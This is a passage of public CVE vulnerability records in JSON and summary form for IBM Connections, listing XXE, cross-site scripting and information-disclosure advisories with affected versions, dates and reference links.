                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                },
                {
                  "name": "ibm-connections-cve20157459-xss(108355)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108355"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7459",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.580Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7461 (GCVE-0-2015-7461)

    Vulnerability from cvelistv5 – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    XML external entity (XXE) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote authenticated users to cause a denial of service (memory consumption) via crafted XML data. IBM X-Force ID: 108357.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.520Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "ibm-connections-cve20157461-dos(108357)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108357"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "XML external entity (XXE) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote authenticated users to cause a denial of service (memory consumption) via crafted XML data. IBM X-Force ID: 108357."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "name": "ibm-connections-cve20157461-dos(108357)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108357"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7461",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "XML external entity (XXE) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote authenticated users to cause a denial of service (memory consumption) via crafted XML data. IBM X-Force ID: 108357."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "ibm-connections-cve20157461-dos(108357)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108357"
                },
                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7461",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.520Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7460 (GCVE-0-2015-7460)

    Vulnerability from cvelistv5 – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108356.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.595Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              },
              {
                "name": "ibm-connections-cve20157460-xss(108356)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108356"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108356."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            },
            {
              "name": "ibm-connections-cve20157460-xss(108356)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108356"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7460",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108356."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                },
                {
                  "name": "ibm-connections-cve20157460-xss(108356)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108356"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7460",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.595Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1682 (GCVE-0-2017-1682)

    Vulnerability from cvelistv5 – Published: 2018-02-14 15:00 – Updated: 2024-09-16 19:41
    VLAI
    Summary
    IBM Connections 4.0, 4.5, 5.0, 5.5, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134004.
    Severity
    No CVSS data available.
    CWE
    • Cross-Site Scripting
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 4.5
    Affected: 4.0
    Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-02-12 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:32.124Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22012900"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "4.5"
                },
                {
                  "status": "affected",
                  "version": "4.0"
                },
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-02-12T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 4.0, 4.5, 5.0, 5.5, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134004."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Cross-Site Scripting",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-02-14T14:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22012900"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-02-12T00:00:00",
              "ID": "CVE-2017-1682",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "4.5"
                              },
                              {
                                "version_value": "4.0"
                              },
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 4.0, 4.5, 5.0, 5.5, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134004."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Cross-Site Scripting"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22012900",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22012900"
                },
                {
                  "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004",
                  "refsource": "MISC",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1682",
        "datePublished": "2018-02-14T15:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-16T19:41:22.595Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1683 (GCVE-0-2017-1683)

    Vulnerability from cvelistv5 – Published: 2017-12-11 21:00 – Updated: 2024-09-17 04:28
    VLAI
    Summary
    IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005.
    Severity
    No CVSS data available.
    CWE
    • Cross-Site Scripting
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 6.0
    Create a notification for this product.
    Date Public
    2017-12-04 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:31.991Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005"
              },
              {
                "name": "102051",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/102051"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2017-12-04T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Cross-Site Scripting",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-12-12T10:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005"
            },
            {
              "name": "102051",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/102051"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2017-12-04T00:00:00",
              "ID": "CVE-2017-1683",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Cross-Site Scripting"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005",
                  "refsource": "MISC",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005"
                },
                {
                  "name": "102051",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/102051"
                },
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22010690",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1683",
        "datePublished": "2017-12-11T21:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-17T04:28:48.799Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1613 (GCVE-0-2017-1613)

    Vulnerability from cvelistv5 – Published: 2017-12-11 21:00 – Updated: 2024-09-16 23:01
    VLAI
    Summary
    IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954.
    Severity
    No CVSS data available.
    CWE
    • Obtain Information
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 6.0
    Create a notification for this product.
    Date Public
    2017-12-04 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:31.528Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "102051",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/102051"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2017-12-04T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Obtain Information",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-12-12T10:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "name": "102051",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/102051"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2017-12-04T00:00:00",
              "ID": "CVE-2017-1613",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Obtain Information"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "102051",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/102051"
                },
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22010690",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
                },
                {
                  "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954",
                  "refsource": "MISC",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1613",
        "datePublished": "2017-12-11T21:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-16T23:01:54.455Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }